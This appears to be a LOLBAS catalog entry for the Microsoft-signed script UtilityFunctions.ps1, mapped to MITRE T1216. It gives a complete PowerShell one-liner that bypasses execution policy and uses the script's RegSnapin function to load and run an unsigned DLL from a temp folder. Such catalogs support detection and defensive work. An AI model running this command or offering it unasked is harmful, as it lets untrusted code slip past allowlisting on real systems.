Catalog LOLBAS

LOL · Script

UtilityFunctions.ps1

1 technique WindowsLOLBAS GPL-3.0

Execute

Execution Windows

Proxy execute Managed DLL with PowerShell

Use Execute proxied payload with Microsoft signed binary

powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"
Context
user
Native
Execute
MITRE
T1216